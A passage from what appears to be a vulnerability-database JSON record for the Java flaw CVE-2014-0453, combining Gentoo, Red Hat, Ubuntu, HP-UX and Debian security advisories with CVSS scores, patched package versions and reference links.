http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4263\n[ 51 ] CVE-2014-4264\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4264\n[ 52 ] CVE-2014-4265\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4265\n[ 53 ] CVE-2014-4266\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4266\n[ 54 ] CVE-2014-4268\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4268\n[ 55 ] CVE-2014-4288\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4288\n[ 56 ] CVE-2014-6456\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6456\n[ 57 ] CVE-2014-6457\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6457\n[ 58 ] CVE-2014-6458\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6458\n[ 59 ] CVE-2014-6466\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6466\n[ 60 ] CVE-2014-6468\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6468\n[ 61 ] CVE-2014-6476\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6476\n[ 62 ] CVE-2014-6485\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6485\n[ 63 ] CVE-2014-6492\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6492\n[ 64 ] CVE-2014-6493\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6493\n[ 65 ] CVE-2014-6502\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6502\n[ 66 ] CVE-2014-6503\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6503\n[ 67 ] CVE-2014-6504\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6504\n[ 68 ] CVE-2014-6506\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6506\n[ 69 ] CVE-2014-6511\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6511\n[ 70 ] CVE-2014-6512\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6512\n[ 71 ] CVE-2014-6513\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6513\n[ 72 ] CVE-2014-6515\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6515\n[ 73 ] CVE-2014-6517\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6517\n[ 74 ] CVE-2014-6519\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6519\n[ 75 ] CVE-2014-6527\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6527\n[ 76 ] CVE-2014-6531\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6531\n[ 77 ] CVE-2014-6532\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6532\n[ 78 ] CVE-2014-6558\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6558\n[ 79 ] CVE-2014-6562\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6562\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n http://security.gentoo.org/glsa/glsa-201502-12.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2015 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n. In a typical operating environment, these are of low\nsecurity risk as the runtime is not used on untrusted applets. Bugs fixed (https://bugzilla.redhat.com/):\n\n1031734 - CVE-2013-6629 libjpeg: information leak (read of uninitialized memory)\n1045561 - CVE-2013-6954 libpng: unhandled zero-length PLTE chunk or NULL palette\n1051519 - CVE-2014-0428 OpenJDK: insufficient security checks in IIOP streams (CORBA, 8025767)\n1051528 - CVE-2014-0422 OpenJDK: insufficient package access checks in the Naming component (JNDI, 8025758)\n1051699 - CVE-2014-0373 OpenJDK: SnmpStatusException handling issues (Serviceability, 7068126)\n1051823 - CVE-2013-5878 OpenJDK: null xmlns handling issue (Security, 8025026)\n1051911 - CVE-2013-5884 OpenJDK: insufficient security checks in CORBA stub factories (CORBA, 8026193)\n1051912 - CVE-2014-0416 OpenJDK: insecure subject principals set handling (JAAS, 8024306)\n1051923 - CVE-2014-0376 OpenJDK: document builder missing security checks (JAXP, 8027201, 8025018)\n1052915 - CVE-2013-5907 ICU: Layout Engine LookupProcessor insufficient input checks (JDK 2D, 8025034)\n1052919 - CVE-2014-0368 OpenJDK: insufficient Socket checkListen checks (Networking, 8011786)\n1052942 - CVE-2013-5910 OpenJDK: XML canonicalizer mutable strings passed to untrusted code (Security, 8026417)\n1053010 - CVE-2014-0411 OpenJDK: TLS/SSL handshake timing issues (JSSE, 8023069)\n1053066 - CVE-2014-0423 OpenJDK: XXE issue in decoder (Beans, 8023245)\n1053266 - CVE-2013-5896 OpenJDK: com.sun.corba.se. ============================================================================\nUbuntu Security Notice USN-2191-1\nMay 01, 2014\n\nopenjdk-6 vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 12.04 LTS\n- Ubuntu 10.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in OpenJDK 6. An attacker could\nexploit these to cause a denial of service or expose sensitive data over\nthe network. An attacker could exploit these\nto expose sensitive data over the network. (CVE-2014-0453, CVE-2014-0460)\n\nA vulnerability was discovered in the OpenJDK JRE related to availability. \nAn attacker could exploit this to cause a denial of service. \n(CVE-2014-0459)\n\nJakub Wilk discovered that the OpenJDK JRE incorrectly handled temporary\nfiles. A local attacker could possibly use this issue to overwrite\narbitrary files. In the default installation of Ubuntu, this should be\nprevented by the Yama link restrictions. (CVE-2014-1876)\n\nA vulnerability was discovered in the OpenJDK JRE related to data\nintegrity. (CVE-2014-2398)\n\nA vulnerability was discovered in the OpenJDK JRE related to information\ndisclosure. An attacker could exploit this to expose sensitive data over\nthe network. (CVE-2014-2403)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 12.04 LTS:\n icedtea-6-jre-cacao 6b31-1.13.3-1ubuntu1~0.12.04.2\n icedtea-6-jre-jamvm 6b31-1.13.3-1ubuntu1~0.12.04.2\n openjdk-6-jre 6b31-1.13.3-1ubuntu1~0.12.04.2\n openjdk-6-jre-headless 6b31-1.13.3-1ubuntu1~0.12.04.2\n openjdk-6-jre-lib 6b31-1.13.3-1ubuntu1~0.12.04.2\n openjdk-6-jre-zero 6b31-1.13.3-1ubuntu1~0.12.04.2\n\nUbuntu 10.04 LTS:\n icedtea-6-jre-cacao 6b31-1.13.3-1ubuntu1~0.10.04.1\n openjdk-6-jre 6b31-1.13.3-1ubuntu1~0.10.04.1\n openjdk-6-jre-headless 6b31-1.13.3-1ubuntu1~0.10.04.1\n openjdk-6-jre-lib 6b31-1.13.3-1ubuntu1~0.10.04.1\n openjdk-6-jre-zero 6b31-1.13.3-1ubuntu1~0.10.04.1\n\nThis update uses a new upstream release, which includes additional bug\nfixes. After a standard system update you need to restart any Java\napplications or applets to make all the necessary changes. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c04398922\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c04398922\nVersion: 1\n\nHPSBUX03091 SSRT101667 rev.1 - HP-UX running Java7, Remote Unauthorized\nAccess, Disclosure of Information, and Other Vulnerabilities\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2014-08-19\nLast Updated: 2014-08-19\n\nPotential Security Impact: Remote unauthorized access, disclosure of\ninformation, and other vulnerabilities\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified in Java Runtime\nEnvironment (JRE) and Java Developer Kit (JDK) running on HP-UX. These\nvulnerabilities could allow remote unauthorized access, disclosure of\ninformation, and other vulnerabilities. \n\nReferences:\n\nCVE-2013-6629\n\nCVE-2013-6954\n\nCVE-2014-0432\n\nCVE-2014-0446\n\nCVE-2014-0448\n\nCVE-2014-0449\n\nCVE-2014-0451\n\nCVE-2014-0452\n\nCVE-2014-0453\n\nCVE-2014-0454\n\nCVE-2014-0455\n\nCVE-2014-0456\n\nCVE-2014-0458\n\nCVE-2014-0459\n\nCVE-2014-0460\n\nCVE-2014-0461\n\nCVE-2014-1876\n\nCVE-2014-2397\n\nCVE-2014-2398\n\nCVE-2014-2401\n\nCVE-2014-2402\n\nCVE-2014-2403\n\nCVE-2014-2409\n\nCVE-2014-2412\n\nCVE-2014-2413\n\nCVE-2014-2414\n\nCVE-2014-2420\n\nCVE-2014-2421\n\nCVE-2014-2422\n\nCVE-2014-2423\n\nCVE-2014-2427\n\nCVE-2014-2428\n\nCVE-2014-2483\n\nCVE-2014-2490\n\nCVE-2014-4208\n\nCVE-2014-4209\n\nCVE-2014-4216\n\nCVE-2014-4218\n\nCVE-2014-4220\n\nCVE-2014-4221\n\nCVE-2014-4223\n\nCVE-2014-4244\n\nCVE-2014-4252\n\nCVE-2014-4262\n\nCVE-2014-4263\n\nCVE-2014-4264\n\nCVE-2014-4265\n\nCVE-2014-4266\n\nCVE-2014-4268\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP-UX B.11.23, and B.11.31 running HP JDK and JRE v7.0.09 and earlier. \n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2013-6629 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2013-6954 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-0432 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\nCVE-2014-0446 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-0448 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6\nCVE-2014-0449 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2014-0451 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-0452 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-0453 (AV:N/AC:H/Au:N/C:P/I:P/A:N) 4.0\nCVE-2014-0454 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-0455 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\nCVE-2014-0456 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2014-0458 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-0459 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\nCVE-2014-0460 (AV:N/AC:M/Au:N/C:P/I:P/A:N) 5.8\nCVE-2014-0461 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\nCVE-2014-1876 (AV:L/AC:M/Au:N/C:P/I:P/A:P) 4.4\nCVE-2014-2397 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\nCVE-2014-2398 (AV:N/AC:M/Au:S/C:N/I:P/A:N) 3.5\nCVE-2014-2401 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2014-2402 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-2403 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2014-2409 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\nCVE-2014-2412 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-2413 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3\nCVE-2014-2414 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-2420 (AV:N/AC:H/Au:N/C:N/I:P/A:N) 2.6\nCVE-2014-2421 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2014-2422 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2014-2423 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-2427 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-2428 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6\nCVE-2014-2483 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\nCVE-2014-2490 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\nCVE-2014-4208 (AV:N/AC:H/Au:N/C:N/I:P/A:N) 2.6\nCVE-2014-4209 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\nCVE-2014-4216 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\nCVE-2014-4218 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2014-4220 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2014-4221 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3\nCVE-2014-4223 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\nCVE-2014-4244 (AV:N/AC:H/Au:N/C:P/I:P/A:N) 4.0\nCVE-2014-4252 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2014-4262 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\nCVE-2014-4263 (AV:N/AC:H/Au:N/C:P/I:P/A:N) 4.0\nCVE-2014-4264 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-4265 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2014-4266 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2014-4268 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has provided the following Java version upgrade to resolve these\nvulnerabilities. \n\nThe upgrade is available from the following location: http://www.hp.com/java\n\nOS Version\n Release Version\n Depot Name\n\nHP-UX B.11.23, B.11.31\n JDK and JRE v7.0.10 or subsequent\n Itanium_JDK_JRE_7.0.10_Aug_2014_Java70_1.7.0.10.00_HP-UX_B.11.31_IA.depot\n\nMANUAL ACTIONS: Yes - Update\nFor Java v7.0 update to Java v7.0.10 or subsequent\n\nPRODUCT SPECIFIC INFORMATION\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application\nthat replaces HP-UX Security Patch Check. It analyzes all Security Bulletins\nissued by HP and lists recommended actions that may apply to a specific HP-UX\nsystem. It can also download patches and create a depot automatically. For\nmore information see https://www.hp.com/go/swa\n\nThe following text is for use by the HP-UX Software Assistant. \n\nAFFECTED VERSIONS\n\nHP-UX B.11.23\nHP-UX B.11.31\n===========\nJdk70.JDK70-COM\nJdk70.JDK70-DEMO\nJdk70.JDK70-IPF32\nJdk70.JDK70-IPF64\nJre70.JRE70-COM\nJre70.JRE70-IPF32\nJre70.JRE70-IPF32-HS\nJre70.JRE70-IPF64\nJre70.JRE70-IPF64-HS\naction: install revision 1.7.0.10.00 or subsequent\n\nEND AFFECTED VERSIONS\n\nHISTORY\nVersion:1 (rev.1) - 19 August 2014 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2014 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. \n\nFor the oldstable distribution (squeeze), these problems have been fixed\nin version 6b31-1.13.3-1~deb6u1. \n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 6b31-1.13.3-1~deb7u1. \n\nFor the testing distribution (jessie), these problems have been fixed in\nversion 6b31-1.13.3-1. \n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 6b31-1.13.3-1. \n\nWe recommend that you upgrade your openjdk-6 packages", "sources": [ { "db": "NVD", "id": "CVE-2014-0453" }, { "db": "JVNDB", "id": "JVNDB-2014-002089" }, { "db": "BID", "id": "66914" }, { "db": "VULHUB", "id": "VHN-67946" }, { "db": "VULMON", "id": "CVE-2014-0453" }, { "db": "PACKETSTORM", "id": "126611" }, { "db": "PACKETSTORM", "id": "126200" }, { "db": "PACKETSTORM", "id": "130400" }, { "db": "PACKETSTORM", "id": "127655" }, { "db": "PACKETSTORM", "id": "126443" }, { "db": "PACKETSTORM", "id": "127938" }, { "db": "PACKETSTORM", "id": "126320" } ], "trust": 2.7 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2014-0453", "trust": 3.6 }, { "db": "BID", "id": "66914", "trust": 2.1 }, { "db": "SECUNIA", "id": "58415", "trust": 1.8 }, { "db": "SECUNIA", "id": "59307", "trust": 1.8 }, { "db": "SECUNIA", "id": "60580", "trust": 1.8 }, { "db": "SECUNIA", "id": "60117", "trust": 1.8 }, { "db": "SECUNIA", "id": "59082", "trust": 1.8 }, { "db": "SECUNIA", "id": "59255", "trust": 1.8 }, { "db": "SECUNIA", "id": "59438", "trust": 1.8 }, { "db": "SECUNIA", "id": "59675", "trust": 1.8 }, { "db": "SECUNIA", "id": "59071", "trust": 1.8 }, { "db": "SECUNIA", "id": "59104", "trust": 1.8 }, { "db": "SECUNIA", "id": "59324", "trust": 1.8 }, { "db": "SECUNIA", "id": "61050", "trust": 1.8 }, { "db": "SECUNIA", "id": "59722", "trust": 1.8 }, { "db": "SECUNIA", "id": "59250", "trust": 1.8 }, { "db": "SECUNIA", "id": "60574", "trust": 1.8 }, { "db": "SECUNIA", "id": "61264", "trust": 1.8 }, { "db": "SECUNIA", "id": "59194", "trust": 1.8 }, { "db": "SECUNIA", "id": "59023", "trust": 1.8 }, { "db": "SECUNIA", "id": "60498", "trust": 1.8 }, { "db": "SECUNIA", "id": "59653", "trust": 1.8 }, { "db": "SECUNIA", "id": "59022", "trust": 1.8 }, { "db": "SECUNIA", "id": "60003", "trust": 1.8 }, { "db": "SECUNIA", "id": "60111", "trust": 1.8 }, { "db": "SECUNIA", "id": "59436", "trust": 1.8 }, { "db": "SECUNIA", "id": "59733", "trust": 1.8 }, { "db": "JUNIPER", "id": "JSA10698", "trust": 1.8 }, { "db": "JVNDB", "id": "JVNDB-2014-002089", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201404-268", "trust": 0.7 }, { "db": "JUNIPER", "id": "JSA10659", "trust": 0.3 }, { "db": "JUNIPER", "id": "JSA10642", "trust": 0.3 }, { "db": "HITACHI", "id": "HS14-009", "trust": 0.3 }, { "db": "VULHUB", "id": "VHN-67946", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2014-0453", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "126611", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "126200", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130400", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127655", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "126443", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127938", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "126320", "trust": 0.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-67946" }, { "db": "VULMON", "id": "CVE-2014-0453" }, { "db": "BID", "id": "66914" }, { "db": "JVNDB", "id": "JVNDB-2014-002089" }, { "db": "PACKETSTORM", "id": "126611" }, { "db": "PACKETSTORM", "id": "126200" }, { "db": "PACKETSTORM", "id": "130400" }, { "db": "PACKETSTORM", "id": "127655" }, { "db": "PACKETSTORM", "id": "126443" }, { "db": "PACKETSTORM", "id": "127938" }, { "db": "PACKETSTORM", "id": "126320" }, { "db": "CNNVD", "id": "CNNVD-201404-268" }, { "db": "NVD", "id": "CVE-2014-0453" } ] }, "id": "VAR-201404-0374", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VULHUB", "id": "VHN-67946" } ], "trust": 0.01 }, "last_update_date": "2024-07-23T20:25:08.563000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "HS14-009", "trust": 0.8, "url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs14-009/index.html" }, { "title": "1672080", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21672080" }, { "title": "1681018", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21681018" }, { "title": "1673836", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673836" }, { "title": "1679713", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21679713" }, { "title": "MIGR-5096132", "trust": 0.8, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5096132" }, { "title": "1674539", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674539" }, { "title": "1677387", "trust": 0.8, "url": "http://www.ibm.com/support/docview.wss?uid=swg21677387" }, { "title": "1675945", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675945" }, { "title": "1682828", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682828" }, { "title": "1676703", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676703" }, { "title": "1680387", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21680387 " }, { "title": "1674530", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674530" }, { "title": "1678113", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678113" }, { "title": "1675588", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675588" }, { "title": "1681256", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21681256" }, { "title": "1675343", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675343" }, { "title": "1681047", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21681047" }, { "title": "Text Form of Oracle Critical Patch Update - April 2014 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2014verbose-1972954.html" }, { "title": "Oracle Critical Patch Update Advisory - April 2014", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2014-1972952.html" }, { "title": "April 2014 Critical Patch Update Released", "trust": 0.8, "url": "https://blogs.oracle.com/security/entry/april_2014_critical_patch_update" }, { "title": "JSA10698", "trust": 0.8, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10698\u0026actp=search" }, { "title": "HS14-009", "trust": 0.8, "url": "http://www.hitachi.co.jp/prod/comp/soft1/security/info/vuls/hs14-009/index.html" }, { "title": "Oracle Corporation Java\u30d7\u30e9\u30b0\u30a4\u30f3\u306e\u8106\u5f31\u6027\u306b\u95a2\u3059\u308b\u304a\u77e5\u3089\u305b", "trust": 0.8, "url": "http://www.fmworld.net/biz/common/oracle/20140417.html" }, { "title": "jdk-7u55-nb-8-linux-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49311" }, { "title": "jdk-8u5-windows-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49315" }, { "title": "jre-8u5-macosx-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49319" }, { "title": "jdk-7u55-nb-8-macosx-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49310" }, { "title": "jre-7u55-linux-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49314" }, { "title": "jre-8u5-windows-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49318" }, { "title": "jdk-7u55-nb-8-windows-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49309" }, { "title": "jre-7u55-macosx-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49313" }, { "title": "jdk-8u5-linux-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49317" }, { "title": "jre-7u55-windows-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49312" }, { "title": "jdk-8u5-macosx-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49316" }, { "title": "jre-8u5-linux-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49320" }, { "title": "Red Hat: CVE-2014-0453", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2014-0453" }, { "title": "Ubuntu Security Notice: openjdk-7 vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2187-1" }, { "title": "Ubuntu Security Notice: openjdk-6 vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2191-1" }, { "title": "Amazon Linux AMI: ALAS-2014-326", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2014-326" }, { "title": "Amazon Linux AMI: ALAS-2014-327", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2014-327" } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-0453" }, { "db": "JVNDB", "id": "JVNDB-2014-002089" }, { "db": "CNNVD", "id": "CNNVD-201404-268" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "NVD-CWE-noinfo", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2014-0453" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.2, "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2014-1972952.html" }, { "trust": 2.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21672080" }, { "trust": 2.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674539" }, { "trust": 2.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675945" }, { "trust": 2.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676190" }, { "trust": 2.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676373" }, { "trust": 2.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676672" }, { "trust": 2.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676703" }, { "trust": 2.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677294" }, { "trust": 2.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21679610" }, { "trust": 2.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21680750" }, { "trust": 2.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21681047" }, { "trust": 2.1, "url": 